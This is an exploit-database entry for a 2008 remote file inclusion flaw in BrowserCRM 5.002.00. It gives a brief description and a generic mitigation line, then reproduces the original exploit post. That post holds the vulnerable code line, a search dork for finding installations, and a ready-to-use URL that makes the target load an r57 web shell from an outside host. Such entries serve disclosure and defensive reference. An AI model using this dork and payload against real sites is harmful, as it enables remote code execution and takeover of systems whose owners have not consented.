header-logo
Suggest Exploit
vendor:
BrowserCRM
by:
ahmadbady
9.3
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: BrowserCRM
Affected Version From: 5.002.00
Affected Version To: 5.002.00
Patch Exists: NO
Related CWE: N/A
CPE: a:browsercrm:browsercrm:5.002.00
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

browsercrm-5.002.00 remote file including

The vulnerability exists due to insufficient sanitization of user-supplied input passed to the 'bcrm_pub_root' parameter in 'clients.php' script. A remote attacker can include arbitrary files from remote resources and execute arbitrary code on the vulnerable system.

Mitigation:

Input validation should be performed to ensure that user-supplied input is properly sanitized.
Source

Exploit-DB raw data:

script: browsercrm-5.002.00 remote file including

Download From: http://www.browsercrm.com/download/browsercrm-5.002.00.tar.gz

dork: Copyright © 2007 BrowserCRM Ltd

Vuln Code :

require_once($bcrm_pub_root . "/public_prepend.inc.php")


exploit:

www.site.com/browser_crm/pub/clients.php?bcrm_pub_root=http://www.gwebspace.de/mohsen/shell/r57.txt?


Author: ahmadbady | kivi_hacker666@yahoo.com

# milw0rm.com [2008-06-08]

Navigation

Suggest Exploit

Services By CQR